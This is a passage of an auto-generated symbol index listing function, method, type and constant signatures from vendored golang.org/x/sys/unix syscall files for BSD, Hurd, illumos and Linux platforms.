func Uname(uname *Utsname) error { function Sendfile (line 242) | func Sendfile(outfd int, infd int, offset *int64, count int) (written in... FILE: vendor/golang.org/x/sys/unix/syscall_dragonfly_amd64.go function setTimespec (line 14) | func setTimespec(sec, nsec int64) Timespec { function setTimeval (line 18) | func setTimeval(sec, usec int64) Timeval { function SetKevent (line 22) | func SetKevent(k *Kevent_t, fd, mode, flags int) { method SetLen (line 28) | func (iov *Iovec) SetLen(length int) { method SetControllen (line 32) | func (msghdr *Msghdr) SetControllen(length int) { method SetIovlen (line 36) | func (msghdr *Msghdr) SetIovlen(length int) { method SetLen (line 40) | func (cmsg *Cmsghdr) SetLen(length int) { function sendfile (line 44) | func sendfile(outfd int, infd int, offset *int64, count int) (written in... function Syscall9 (line 56) | func Syscall9(num, a1, a2, a3, a4, a5, a6, a7, a8, a9 uintptr) (r1, r2 u... FILE: vendor/golang.org/x/sys/unix/syscall_freebsd.go function supportsABI (line 27) | func supportsABI(ver uint32) bool { type SockaddrDatalink (line 33) | type SockaddrDatalink struct function anyToSockaddrGOOS (line 45) | func anyToSockaddrGOOS(fd int, rsa *RawSockaddrAny) (Sockaddr, error) { function nametomib (line 50) | func nametomib(name string) (mib []_C_int, err error) { function direntIno (line 77) | func direntIno(buf []byte) (uint64, bool) { function direntReclen (line 81) | func direntReclen(buf []byte) (uint64, bool) { function direntNamlen (line 85) | func direntNamlen(buf []byte) (uint64, bool) { function Pipe (line 89) | func Pipe(p []int) (err error) { function Pipe2 (line 95) | func Pipe2(p []int, flags int) error { function GetsockoptIPMreqn (line 108) | func GetsockoptIPMreqn(fd, level, opt int) (*IPMreqn, error) { function SetsockoptIPMreqn (line 115) | func SetsockoptIPMreqn(fd, level, opt int, mreq *IPMreqn) (err error) { function GetsockoptXucred (line 121) | func GetsockoptXucred(fd, level, opt int) (*Xucred, error) { function Accept4 (line 128) | func Accept4(fd, flags int) (nfd int, sa Sockaddr, err error) { function Getfsstat (line 148) | func Getfsstat(buf []Statfs_t, flags int) (n int, err error) { function Uname (line 170) | func Uname(uname *Utsname) error { function Stat (line 217) | func Stat(path string, st *Stat_t) (err error) { function Lstat (line 221) | func Lstat(path string, st *Stat_t) (err error) { function Getdents (line 225) | func Getdents(fd int, buf []byte) (n int, err error) { function Getdirentries (line 229) | func Getdirentries(fd int, buf []byte, basep *uintptr) (n int, err error) { function Mknod (line 247) | func Mknod(path string, mode uint32, dev uint64) (err error) { function Sendfile (line 251) | func Sendfile(outfd int, infd int, offset *int64, count int) (written in... function PtraceAttach (line 261) | func PtraceAttach(pid int) (err error) { function PtraceCont (line 265) | func PtraceCont(pid int, signal int) (err error) { function PtraceDetach (line 269) | func PtraceDetach(pid int) (err error) { function PtraceGetFpRegs (line 273) | func PtraceGetFpRegs(pid int, fpregsout *FpReg) (err error) { function PtraceGetRegs (line 277) | func PtraceGetRegs(pid int, regsout *Reg) (err error) { function PtraceIO (line 281) | func PtraceIO(req int, pid int, offs uintptr, out []byte, countin int) (... function PtraceLwpEvents (line 298) | func PtraceLwpEvents(pid int, enable int) (err error) { function PtraceLwpInfo (line 302) | func PtraceLwpInfo(pid int, info *PtraceLwpInfoStruct) (err error) { function PtracePeekData (line 306) | func PtracePeekData(pid int, addr uintptr, out []byte) (count int, err e... function PtracePeekText (line 310) | func PtracePeekText(pid int, addr uintptr, out []byte) (count int, err e... function PtracePokeData (line 314) | func PtracePokeData(pid int, addr uintptr, data []byte) (count int, err ... function PtracePokeText (line 318) | func PtracePokeText(pid int, addr uintptr, data []byte) (count int, err ... function PtraceSetRegs (line 322) | func PtraceSetRegs(pid int, regs *Reg) (err error) { function PtraceSingleStep (line 326) | func PtraceSingleStep(pid int) (err error) { function Dup3 (line 330) | func Dup3(oldfd, newfd, flags int) error { FILE: vendor/golang.org/x/sys/unix/syscall_freebsd_386.go function setTimespec (line 14) | func setTimespec(sec, nsec int64) Timespec { function setTimeval (line 18) | func setTimeval(sec, usec int64) Timeval { function SetKevent (line 22) | func SetKevent(k *Kevent_t, fd, mode, flags int) { method SetLen (line 28) | func (iov *Iovec) SetLen(length int) { method SetControllen (line 32) | func (msghdr *Msghdr) SetControllen(length int) { method SetIovlen (line 36) | func (msghdr *Msghdr) SetIovlen(length int) { method SetLen (line 40) | func (cmsg *Cmsghdr) SetLen(length int) { method SetLen (line 44) | func (d *PtraceIoDesc) SetLen(length int) { function sendfile (line 48) | func sendfile(outfd int, infd int, offset *int64, count int) (written in... function Syscall9 (line 60) | func Syscall9(num, a1, a2, a3, a4, a5, a6, a7, a8, a9 uintptr) (r1, r2 u... function PtraceGetFsBase (line 62) | func PtraceGetFsBase(pid int, fsbase *int64) (err error) { FILE: vendor/golang.org/x/sys/unix/syscall_freebsd_amd64.go function setTimespec (line 14) | func setTimespec(sec, nsec int64) Timespec { function setTimeval (line 18) | func setTimeval(sec, usec int64) Timeval { function SetKevent (line 22) | func SetKevent(k *Kevent_t, fd, mode, flags int) { method SetLen (line 28) | func (iov *Iovec) SetLen(length int) { method SetControllen (line 32) | func (msghdr *Msghdr) SetControllen(length int) { method SetIovlen (line 36) | func (msghdr *Msghdr) SetIovlen(length int) { method SetLen (line 40) | func (cmsg *Cmsghdr) SetLen(length int) { method SetLen (line 44) | func (d *PtraceIoDesc) SetLen(length int) { function sendfile (line 48) | func sendfile(outfd int, infd int, offset *int64, count int) (written in... function Syscall9 (line 60) | func Syscall9(num, a1, a2, a3, a4, a5, a6, a7, a8, a9 uintptr) (r1, r2 u... function PtraceGetFsBase (line 62) | func PtraceGetFsBase(pid int, fsbase *int64) (err error) { FILE: vendor/golang.org/x/sys/unix/syscall_freebsd_arm.go function setTimespec (line 14) | func setTimespec(sec, nsec int64) Timespec { function setTimeval (line 18) | func setTimeval(sec, usec int64) Timeval { function SetKevent (line 22) | func SetKevent(k *Kevent_t, fd, mode, flags int) { method SetLen (line 28) | func (iov *Iovec) SetLen(length int) { method SetControllen (line 32) | func (msghdr *Msghdr) SetControllen(length int) { method SetIovlen (line 36) | func (msghdr *Msghdr) SetIovlen(length int) { method SetLen (line 40) | func (cmsg *Cmsghdr) SetLen(length int) { method SetLen (line 44) | func (d *PtraceIoDesc) SetLen(length int) { function sendfile (line 48) | func sendfile(outfd int, infd int, offset *int64, count int) (written in... function Syscall9 (line 60) | func Syscall9(num, a1, a2, a3, a4, a5, a6, a7, a8, a9 uintptr) (r1, r2 u... FILE: vendor/golang.org/x/sys/unix/syscall_freebsd_arm64.go function setTimespec (line 14) | func setTimespec(sec, nsec int64) Timespec { function setTimeval (line 18) | func setTimeval(sec, usec int64) Timeval { function SetKevent (line 22) | func SetKevent(k *Kevent_t, fd, mode, flags int) { method SetLen (line 28) | func (iov *Iovec) SetLen(length int) { method SetControllen (line 32) | func (msghdr *Msghdr) SetControllen(length int) { method SetIovlen (line 36) | func (msghdr *Msghdr) SetIovlen(length int) { method SetLen (line 40) | func (cmsg *Cmsghdr) SetLen(length int) { method SetLen (line 44) | func (d *PtraceIoDesc) SetLen(length int) { function sendfile (line 48) | func sendfile(outfd int, infd int, offset *int64, count int) (written in... function Syscall9 (line 60) | func Syscall9(num, a1, a2, a3, a4, a5, a6, a7, a8, a9 uintptr) (r1, r2 u... FILE: vendor/golang.org/x/sys/unix/syscall_freebsd_riscv64.go function setTimespec (line 14) | func setTimespec(sec, nsec int64) Timespec { function setTimeval (line 18) | func setTimeval(sec, usec int64) Timeval { function SetKevent (line 22) | func SetKevent(k *Kevent_t, fd, mode, flags int) { method SetLen (line 28) | func (iov *Iovec) SetLen(length int) { method SetControllen (line 32) | func (msghdr *Msghdr) SetControllen(length int) { method SetIovlen (line 36) | func (msghdr *Msghdr) SetIovlen(length int) { method SetLen (line 40) | func (cmsg *Cmsghdr) SetLen(length int) { method SetLen (line 44) | func (d *PtraceIoDesc) SetLen(length int) { function sendfile (line 48) | func sendfile(outfd int, infd int, offset *int64, count int) (written in... function Syscall9 (line 60) | func Syscall9(num, a1, a2, a3, a4, a5, a6, a7, a8, a9 uintptr) (r1, r2 u... FILE: vendor/golang.org/x/sys/unix/syscall_hurd.go function ioctl (line 15) | func ioctl(fd int, req uint, arg uintptr) (err error) { function ioctlPtr (line 23) | func ioctlPtr(fd int, req uint, arg unsafe.Pointer) (err error) { FILE: vendor/golang.org/x/sys/unix/syscall_hurd_386.go constant TIOCGETA (line 10) | TIOCGETA = 0x62251713 type Winsize (line 13) | type Winsize struct type Termios (line 20) | type Termios struct FILE: vendor/golang.org/x/sys/unix/syscall_illumos.go function bytes2iovec (line 15) | func bytes2iovec(bs [][]byte) []Iovec { function Readv (line 30) | func Readv(fd int, iovs [][]byte) (n int, err error) { function Preadv (line 38) | func Preadv(fd int, iovs [][]byte, off int64) (n int, err error) { function Writev (line 46) | func Writev(fd int, iovs [][]byte) (n int, err error) { function Pwritev (line 54) | func Pwritev(fd int, iovs [][]byte, off int64) (n int, err error) { function Accept4 (line 62) | func Accept4(fd int, flags int) (nfd int, sa Sockaddr, err error) { FILE: vendor/golang.org/x/sys/unix/syscall_linux.go function Access (line 26) | func Access(path string, mode uint32) (err error) { function Chmod (line 30) | func Chmod(path string, mode uint32) (err error) { function Chown (line 34) | func Chown(path string, uid int, gid int) (err error) { function Creat (line 38) | func Creat(path string, mode uint32) (fd int, err error) { function EpollCreate (line 42) | func EpollCreate(size int) (fd int, err error) { function FanotifyMark (line 52) | func FanotifyMark(fd int, flags uint, mask uint64, dirFd int, pathname s... function Fchmodat (line 66) | func Fchmodat(dirfd int, path string, mode uint32, flags int) error { function InotifyInit (line 85) | func InotifyInit() (fd int, err error) { function Link (line 104) | func Link(oldpath string, newpath string) (err error) { function Mkdir (line 108) | func Mkdir(path string, mode uint32) (err error) { function Mknod (line 112) | func Mknod(path string, mode uint32, dev int) (err error) { function Open (line 116) | func Open(path string, mode int, perm uint32) (fd int, err error) { function Openat (line 122) | func Openat(dirfd int, path string, flags int, mode uint32) (fd int, err... function Openat2 (line 128) | func Openat2(dirfd int, path string, how *OpenHow) (fd int, err error) { function Pipe (line 132) | func Pipe(p []int) error { function Pipe2 (line 138) | func Pipe2(p []int, flags int) error { function Ppoll (line 153) | func Ppoll(fds []PollFd, timeout *Timespec, sigmask *Sigset_t) (n int, e... function Poll (line 160) | func Poll(fds []PollFd, timeout int) (n int, err error) { function Readlink (line 171) | func Readlink(path string, buf []byte) (n int, err error) { function Rename (line 175) | func Rename(oldpath string, newpath string) (err error) { function Rmdir (line 179) | func Rmdir(path string) error { function Symlink (line 185) | func Symlink(oldpath string, newpath string) (err error) { function Unlink (line 189) | func Unlink(path string) error { function Utimes (line 195) | func Utimes(path string, tv []Timeval) error { function UtimesNano (line 218) | func UtimesNano(path string, ts []Timespec) error { function UtimesNanoAt (line 222) | func UtimesNanoAt(dirfd int, path string, ts []Timespec, flags int) error { function Futimesat (line 232) | func Futimesat(dirfd int, path string, tv []Timeval) error { function Futimes (line 242) | func Futimes(fd int, tv []Timeval) (err error) { constant ImplementsGetwd (line 248) | ImplementsGetwd = true function Getwd (line 252) | func Getwd() (wd string, err error) { function Getgroups (line 272) | func Getgroups() (gids []int, err error) { function Setgroups (line 298) | func Setgroups(gids []int) (err error) { type WaitStatus (line 310) | type WaitStatus method Exited (line 329) | func (w WaitStatus) Exited() bool { return w&mask == exited } method Signaled (line 331) | func (w WaitStatus) Signaled() bool { return w&mask != stopped && w&ma... method Stopped (line 333) | func (w WaitStatus) Stopped() bool { return w&0xFF == stopped } method Continued (line 335) | func (w WaitStatus) Continued() bool { return w == 0xFFFF } method CoreDump (line 337) | func (w WaitStatus) CoreDump() bool { return w.Signaled() && w&core !=... method ExitStatus (line 339) | func (w WaitStatus) ExitStatus() int { method Signal (line 346) | func (w WaitStatus) Signal() syscall.Signal { method StopSignal (line 353) | func (w WaitStatus) StopSignal() syscall.Signal { method TrapCause (line 360) | func (w WaitStatus) TrapCause() int { constant mask (line 322) | mask = 0x7F constant core (line 323) | core = 0x80 constant exited (line 324) | exited = 0x00 constant stopped (line 325) | stopped = 0x7F constant shift (line 326) | shift = 8 function Wait4 (line 369) | func Wait4(pid int, wstatus *WaitStatus, options int, rusage *Rusage) (w... function Mkfifo (line 380) | func Mkfifo(path string, mode uint32) error { function Mkfifoat (line 384) | func Mkfifoat(dirfd int, path string, mode uint32) error { method sockaddr (line 388) | func (sa *SockaddrInet4) sockaddr() (unsafe.Pointer, _Socklen, error) { method sockaddr (line 400) | func (sa *SockaddrInet6) sockaddr() (unsafe.Pointer, _Socklen, error) { method sockaddr (line 413) | func (sa *SockaddrUnix) sockaddr() (unsafe.Pointer, _Socklen, error) { type SockaddrLinklayer (line 439) | type SockaddrLinklayer struct method sockaddr (line 449) | func (sa *SockaddrLinklayer) sockaddr() (unsafe.Pointer, _Socklen, err... type SockaddrNetlink (line 464) | type SockaddrNetlink struct method sockaddr (line 472) | func (sa *SockaddrNetlink) sockaddr() (unsafe.Pointer, _Socklen, error) { type SockaddrHCI (line 482) | type SockaddrHCI struct method sockaddr (line 488) | func (sa *SockaddrHCI) sockaddr() (unsafe.Pointer, _Socklen, error) { type SockaddrL2 (line 497) | type SockaddrL2 struct method sockaddr (line 505) | func (sa *SockaddrL2) sockaddr() (unsafe.Pointer, _Socklen, error) { type SockaddrRFCOMM (line 543) | type SockaddrRFCOMM struct method sockaddr (line 554) | func (sa *SockaddrRFCOMM) sockaddr() (unsafe.Pointer, _Socklen, error) { type SockaddrCAN (line 578) | type SockaddrCAN struct method sockaddr (line 585) | func (sa *SockaddrCAN) sockaddr() (unsafe.Pointer, _Socklen, error) { type SockaddrCANJ1939 (line 606) | type SockaddrCANJ1939 struct method sockaddr (line 614) | func (sa *SockaddrCANJ1939) sockaddr() (unsafe.Pointer, _Socklen, erro... type SockaddrALG (line 695) | type SockaddrALG struct method sockaddr (line 703) | func (sa *SockaddrALG) sockaddr() (unsafe.Pointer, _Socklen, error) { type SockaddrVM (line 726) | type SockaddrVM struct method sockaddr (line 738) | func (sa *SockaddrVM) sockaddr() (unsafe.Pointer, _Socklen, error) { type SockaddrXDP (line 747) | type SockaddrXDP struct method sockaddr (line 755) | func (sa *SockaddrXDP) sockaddr() (unsafe.Pointer, _Socklen, error) { constant px_proto_oe (line 772) | px_proto_oe = 0 type SockaddrPPPoE (line 774) | type SockaddrPPPoE struct method sockaddr (line 781) | func (sa *SockaddrPPPoE) sockaddr() (unsafe.Pointer, _Socklen, error) { type SockaddrTIPC (line 812) | type SockaddrTIPC struct method sockaddr (line 861) | func (sa *SockaddrTIPC) sockaddr() (unsafe.Pointer, _Socklen, error) { type TIPCAddr (line 832) | type TIPCAddr interface method tipcAddr (line 837) | func (sa *TIPCSocketAddr) tipcAddr() [12]byte { method tipcAddrtype (line 843) | func (sa *TIPCSocketAddr) tipcAddrtype() uint8 { return TIPC_SOCKET_ADDR } method tipcAddr (line 845) | func (sa *TIPCServiceRange) tipcAddr() [12]byte { method tipcAddrtype (line 851) | func (sa *TIPCServiceRange) tipcAddrtype() uint8 { return TIPC_SERVICE_R... method tipcAddr (line 853) | func (sa *TIPCServiceName) tipcAddr() [12]byte { method tipcAddrtype (line 859) | func (sa *TIPCServiceName) tipcAddrtype() uint8 { return TIPC_SERVICE_AD... type SockaddrL2TPIP (line 873) | type SockaddrL2TPIP struct method sockaddr (line 879) | func (sa *SockaddrL2TPIP) sockaddr() (unsafe.Pointer, _Socklen, error) { type SockaddrL2TPIP6 (line 887) | type SockaddrL2TPIP6 struct method sockaddr (line 894) | func (sa *SockaddrL2TPIP6) sockaddr() (unsafe.Pointer, _Socklen, error) { type SockaddrIUCV (line 903) | type SockaddrIUCV struct method sockaddr (line 909) | func (sa *SockaddrIUCV) sockaddr() (unsafe.Pointer, _Socklen, error) { type SockaddrNFC (line 931) | type SockaddrNFC struct method sockaddr (line 938) | func (sa *SockaddrNFC) sockaddr() (unsafe.Pointer, _Socklen, error) { type SockaddrNFCLLCP (line 946) | type SockaddrNFCLLCP struct method sockaddr (line 956) | func (sa *SockaddrNFCLLCP) sockaddr() (unsafe.Pointer, _Socklen, error) { function anyToSockaddr (line 975) | func anyToSockaddr(fd int, rsa *RawSockaddrAny) (Sockaddr, error) { function Accept (line 1235) | func Accept(fd int) (nfd int, sa Sockaddr, err error) { function Accept4 (line 1250) | func Accept4(fd int, flags int) (nfd int, sa Sockaddr, err error) { function Getsockname (line 1268) | func Getsockname(fd int) (sa Sockaddr, err error) { function GetsockoptIPMreqn (line 1277) | func GetsockoptIPMreqn(fd, level, opt int) (*IPMreqn, error) { function GetsockoptUcred (line 1284) | func GetsockoptUcred(fd, level, opt int) (*Ucred, error) { function GetsockoptTCPInfo (line 1291) | func GetsockoptTCPInfo(fd, level, opt int) (*TCPInfo, error) { function GetsockoptString (line 1300) | func GetsockoptString(fd, level, opt int) (string, error) { function GetsockoptTpacketStats (line 1316) | func GetsockoptTpacketStats(fd, level, opt int) (*TpacketStats, error) { function GetsockoptTpacketStatsV3 (line 1323) | func GetsockoptTpacketStatsV3(fd, level, opt int) (*TpacketStatsV3, erro... function SetsockoptIPMreqn (line 1330) | func SetsockoptIPMreqn(fd, level, opt int, mreq *IPMreqn) (err error) { function SetsockoptPacketMreq (line 1334) | func SetsockoptPacketMreq(fd, level, opt int, mreq *PacketMreq) error { function SetsockoptSockFprog (line 1340) | func SetsockoptSockFprog(fd, level, opt int, fprog *SockFprog) error { function SetsockoptCanRawFilter (line 1344) | func SetsockoptCanRawFilter(fd, level, opt int, filter []CanFilter) error { function SetsockoptTpacketReq (line 1352) | func SetsockoptTpacketReq(fd, level, opt int, tp *TpacketReq) error { function SetsockoptTpacketReq3 (line 1356) | func SetsockoptTpacketReq3(fd, level, opt int, tp *TpacketReq3) error { function SetsockoptTCPRepairOpt (line 1360) | func SetsockoptTCPRepairOpt(fd, level, opt int, o []TCPRepairOpt) (err e... function SetsockoptTCPMD5Sig (line 1367) | func SetsockoptTCPMD5Sig(fd, level, opt int, s *TCPMD5Sig) error { function KeyctlString (line 1387) | func KeyctlString(cmd int, id int) (string, error) { function KeyctlGetKeyringID (line 1416) | func KeyctlGetKeyringID(id int, create bool) (ringid int, err error) { function KeyctlSetperm (line 1429) | func KeyctlSetperm(id int, perm uint32) error { function KeyctlJoinSessionKeyring (line 1439) | func KeyctlJoinSessionKeyring(name string) (ringid int, err error) { function KeyctlSearch (line 1448) | func KeyctlSearch(ringid int, keyType, description string, destRingid in... function KeyctlInstantiateIOV (line 1459) | func KeyctlInstantiateIOV(id int, payload []Iovec, ringid int) error { function KeyctlDHCompute (line 1474) | func KeyctlDHCompute(params *KeyctlDHParams, buffer []byte) (size int, e... function KeyctlRestrictKeyring (line 1496) | func KeyctlRestrictKeyring(ringid int, keyType string, restriction strin... function recvmsgRaw (line 1506) | func recvmsgRaw(fd int, iov []Iovec, oob []byte, flags int, rsa *RawSock... function sendmsgN (line 1541) | func sendmsgN(fd int, iov []Iovec, oob []byte, ptr unsafe.Pointer, salen... function BindToDevice (line 1580) | func BindToDevice(fd int, device string) (err error) { function ptracePeek (line 1587) | func ptracePeek(req int, pid int, addr uintptr, out []byte) (count int, ... function PtracePeekText (line 1627) | func PtracePeekText(pid int, addr uintptr, out []byte) (count int, err e... function PtracePeekData (line 1631) | func PtracePeekData(pid int, addr uintptr, out []byte) (count int, err e... function PtracePeekUser (line 1635) | func PtracePeekUser(pid int, addr uintptr, out []byte) (count int, err e... function ptracePoke (line 1639) | func ptracePoke(pokeReq int, peekReq int, pid int, addr uintptr, data []... function PtracePokeText (line 1690) | func PtracePokeText(pid int, addr uintptr, data []byte) (count int, err ... function PtracePokeData (line 1694) | func PtracePokeData(pid int, addr uintptr, data []byte) (count int, err ... function PtracePokeUser (line 1698) | func PtracePokeUser(pid int, addr uintptr, data []byte) (count int, err ... constant elfNT_PRSTATUS (line 1705) | elfNT_PRSTATUS = 1 function PtraceGetRegs (line 1707) | func PtraceGetRegs(pid int, regsout *PtraceRegs) (err error) { function PtraceSetRegs (line 1714) | func PtraceSetRegs(pid int, regs *PtraceRegs) (err error) { function PtraceSetOptions (line 1721) | func PtraceSetOptions(pid int, options int) (err error) { function PtraceGetEventMsg (line 1725) | func PtraceGetEventMsg(pid int) (msg uint, err error) { function PtraceCont (line 1732) | func PtraceCont(pid int, signal int) (err error) { function PtraceSyscall (line 1736) | func PtraceSyscall(pid int, signal int) (err error) { function PtraceSingleStep (line 1740) | func PtraceSingleStep(pid int) (err error) { return ptrace(PTRACE_SINGLE... function PtraceInterrupt (line 1742) | func PtraceInterrupt(pid int) (err error) { return ptrace(PTRACE_INTERRU... function PtraceAttach (line 1744) | func PtraceAttach(pid int) (err error) { return ptrace(PTRACE_ATTACH, pi... function PtraceSeize (line 1746) | func PtraceSeize(pid int) (err error) { return ptrace(PTRACE_SEIZE, pid,... function PtraceDetach (line 1748) | func PtraceDetach(pid int) (err error) { return ptrace(PTRACE_DETACH, pi... function Reboot (line 1752) | func Reboot(cmd int) (err error) { function direntIno (line 1756) | func direntIno(buf []byte) (uint64, bool) { function direntReclen (line 1760) | func direntReclen(buf []byte) (uint64, bool) { function direntNamlen (line 1764) | func direntNamlen(buf []byte) (uint64, bool) { function Mount (line 1774) | func Mount(source string, target string, fstype string, flags uintptr, d... function MountSetattr (line 1793) | func MountSetattr(dirfd int, pathname string, flags uint, attr *MountAtt... function Sendfile (line 1797) | func Sendfile(outfd int, infd int, offset *int64, count int) (written in... function Dup2 (line 1828) | func Dup2(oldfd, newfd int) error { function fsconfigCommon (line 1855) | func fsconfigCommon(fd int, cmd uint, key string, value *byte, aux int) ... function FsconfigSetFlag (line 1868) | func FsconfigSetFlag(fd int, key string) (err error) { function FsconfigSetString (line 1878) | func FsconfigSetString(fd int, key string, value string) (err error) { function FsconfigSetBinary (line 1892) | func FsconfigSetBinary(fd int, key string, value []byte) (err error) { function FsconfigSetPath (line 1906) | func FsconfigSetPath(fd int, key string, path string, atfd int) (err err... function FsconfigSetPathEmpty (line 1917) | func FsconfigSetPathEmpty(fd int, key string, path string, atfd int) (er... function FsconfigSetFd (line 1931) | func FsconfigSetFd(fd int, key string, value int) (err error) { function FsconfigCreate (line 1939) | func FsconfigCreate(fd int) (err error) { function FsconfigReconfigure (line 1947) | func FsconfigReconfigure(fd int) (err error) { function Getpgrp (line 1954) | func Getpgrp() (pid int) { function syscall_prlimit (line 2000) | func syscall_prlimit(pid, resource int, newlimit, old *syscall.Rlimit) e... function Prlimit (line 2002) | func Prlimit(pid, resource int, newlimit, old *Rlimit) error { function PrctlRetInt (line 2011) | func PrctlRetInt(option int, arg2 uintptr, arg3 uintptr, arg4 uintptr, a... function Setuid (line 2019) | func Setuid(uid int) (err error) { function Setgid (line 2023) | func Setgid(gid int) (err error) { function Setreuid (line 2027) | func Setreuid(ruid, euid int) (err error) { function Setregid (line 2031) | func Setregid(rgid, egid int) (err error) { function Setresuid (line 2035) | func Setresuid(ruid, euid, suid int) (err error) { function Setresgid (line 2039) | func Setresgid(rgid, egid, sgid int) (err error) { function SetfsgidRetGid (line 2046) | func SetfsgidRetGid(gid int) (int, error) { function SetfsuidRetUid (line 2053) | func SetfsuidRetUid(uid int) (int, error) { function Setfsgid (line 2057) | func Setfsgid(gid int) error { function Setfsuid (line 2062) | func Setfsuid(uid int) error { function Signalfd (line 2067) | func Signalfd(fd int, sigmask *Sigset_t, flags int) (newfd int, err erro... constant minIovec (line 2103) | minIovec = 8 function appendBytes (line 2106) | func appendBytes(vecs []Iovec, bs [][]byte) []Iovec { function offs2lohi (line 2121) | func offs2lohi(offs int64) (lo, hi uintptr) { function Readv (line 2126) | func Readv(fd int, iovs [][]byte) (n int, err error) { function Preadv (line 2134) | func Preadv(fd int, iovs [][]byte, offset int64) (n int, err error) { function Preadv2 (line 2143) | func Preadv2(fd int, iovs [][]byte, offset int64, flags int) (n int, err... function readvRacedetect (line 2152) | func readvRacedetect(iovecs []Iovec, n int, err error) { function Writev (line 2171) | func Writev(fd int, iovs [][]byte) (n int, err error) { function Pwritev (line 2182) | func Pwritev(fd int, iovs [][]byte, offset int64) (n int, err error) { function Pwritev2 (line 2194) | func Pwritev2(fd int, iovs [][]byte, offset int64, flags int) (n int, er... function writevRacedetect (line 2206) | func writevRacedetect(iovecs []Iovec, n int) { constant mremapFixed (line 2234) | mremapFixed = MREMAP_FIXED constant mremapDontunmap (line 2235) | mremapDontunmap = MREMAP_DONTUNMAP constant mremapMaymove (line 2236) | mremapMaymove = MREMAP_MAYMOVE function Vmsplice (line 2241) | func Vmsplice(fd int, iovs []Iovec, flags int) (int, error) { function isGroupMember (line 2255) | func isGroupMember(gid int) bool { function isCapDacOverrideSet (line 2269) | func isCapDacOverrideSet() bool { function Faccessat (line 2280) | func Faccessat(dirfd int, path string, mode uint32, flags int) (err erro... type fileHandle (line 2367) | type fileHandle struct type FileHandle (line 2375) | type FileHandle struct method Size (line 2390) | func (fh *FileHandle) Size() int { return int(fh.fileHandle.Bytes) } method Type (line 2391) | func (fh *FileHandle) Type() int32 { return fh.fileHandle.Type } method Bytes (line 2392) | func (fh *FileHandle) Bytes() []byte { function NewFileHandle (line 2380) | func NewFileHandle(handleType int32, handle []byte) FileHandle { function NameToHandleAt (line 2402) | func NameToHandleAt(dirfd int, path string, flags int) (handle FileHandl... function OpenByHandleAt (line 2431) | func OpenByHandleAt(mountFD int, handle FileHandle, flags int) (fd int, ... function Klogset (line 2437) | func Klogset(typ int, arg int) (err error) { type RemoteIovec (line 2450) | type RemoteIovec struct function MakeItimerval (line 2471) | func MakeItimerval(interval, value time.Duration) Itimerval { type ItimerWhich (line 2480) | type ItimerWhich constant ItimerReal (line 2484) | ItimerReal ItimerWhich = ITIMER_REAL constant ItimerVirtual (line 2485) | ItimerVirtual ItimerWhich = ITIMER_VIRTUAL constant ItimerProf (line 2486) | ItimerProf ItimerWhich = ITIMER_PROF function Getitimer (line 2491) | func Getitimer(which ItimerWhich) (Itimerval, error) { function Setitimer (line 2504) | func Setitimer(which ItimerWhich, it Itimerval) (Itimerval, error) { function PthreadSigmask (line 2515) | func PthreadSigmask(how int, set, oldset *Sigset_t) error { function Getresuid (line 2526) | func Getresuid() (ruid, euid, suid int) { function Getresgid (line 2532) | func Getresgid() (rgid, egid, sgid int) { function Pselect (line 2540) | func Pselect(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timespec, s... function SchedSetAttr (line 2576) | func SchedSetAttr(pid int, attr *SchedAttr, flags uint) error { function SchedGetAttr (line 2586) | func SchedGetAttr(pid int, flags uint) (*SchedAttr, error) { FILE: vendor/golang.org/x/sys/unix/syscall_linux_386.go function setTimespec (line 13) | func setTimespec(sec, nsec int64) Timespec { function setTimeval (line 17) | func setTimeval(sec, usec int64) Timeval { function mmap (line 55) | func mmap(addr uintptr, length uintptr, prot int, flags int, fd int, off... type rlimit32 (line 63) | type rlimit32 struct constant rlimInf32 (line 70) | rlimInf32 = ^uint32(0) constant rlimInf64 (line 71) | rlimInf64 = ^uint64(0) function Getrlimit (line 73) | func Getrlimit(resource int, rlim *Rlimit) (err error) { function Seek (line 99) | func Seek(fd int, offset int64, whence int) (newoffset int64, err error) { constant _SOCKET (line 122) | _SOCKET = 1 constant _BIND (line 123) | _BIND = 2 constant _CONNECT (line 124) | _CONNECT = 3 constant _LISTEN (line 125) | _LISTEN = 4 constant _ACCEPT (line 126) | _ACCEPT = 5 constant _GETSOCKNAME (line 127) | _GETSOCKNAME = 6 constant _GETPEERNAME (line 128) | _GETPEERNAME = 7 constant _SOCKETPAIR (line 129) | _SOCKETPAIR = 8 constant _SEND (line 130) | _SEND = 9 constant _RECV (line 131) | _RECV = 10 constant _SENDTO (line 132) | _SENDTO = 11 constant _RECVFROM (line 133) | _RECVFROM = 12 constant _SHUTDOWN (line 134) | _SHUTDOWN = 13 constant _SETSOCKOPT (line 135) | _SETSOCKOPT = 14 constant _GETSOCKOPT (line 136) | _GETSOCKOPT = 15 constant _SENDMSG (line 137) | _SENDMSG = 16 constant _RECVMSG (line 138) | _RECVMSG = 17 constant _ACCEPT4 (line 139) | _ACCEPT4 = 18 constant _RECVMMSG (line 140) | _RECVMMSG = 19 constant _SENDMMSG (line 141) | _SENDMMSG = 20 function accept4 (line 144) | func accept4(s int, rsa *RawSockaddrAny, addrlen *_Socklen, flags int) (... function getsockname (line 152) | func getsockname(s int, rsa *RawSockaddrAny, addrlen *_Socklen) (err err... function getpeername (line 160) | func getpeername(s int, rsa *RawSockaddrAny, addrlen *_Socklen) (err err... function socketpair (line 168) | func socketpair(domain int, typ int, flags int, fd *[2]int32) (err error) { function bind (line 176) | func bind(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function connect (line 184) | func connect(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function socket (line 192) | func socket(domain int, typ int, proto int) (fd int, err error) { function getsockopt (line 200) | func getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *... function setsockopt (line 208) | func setsockopt(s int, level int, name int, val unsafe.Pointer, vallen u... function recvfrom (line 216) | func recvfrom(s int, p []byte, flags int, from *RawSockaddrAny, fromlen ... function sendto (line 228) | func sendto(s int, p []byte, flags int, to unsafe.Pointer, addrlen _Sock... function recvmsg (line 240) | func recvmsg(s int, msg *Msghdr, flags int) (n int, err error) { function sendmsg (line 248) | func sendmsg(s int, msg *Msghdr, flags int) (n int, err error) { function Listen (line 256) | func Listen(s int, n int) (err error) { function Shutdown (line 264) | func Shutdown(s, how int) (err error) { function Fstatfs (line 272) | func Fstatfs(fd int, buf *Statfs_t) (err error) { function Statfs (line 280) | func Statfs(path string, buf *Statfs_t) (err error) { method PC (line 292) | func (r *PtraceRegs) PC() uint64 { return uint64(uint32(r.Eip)) } method SetPC (line 294) | func (r *PtraceRegs) 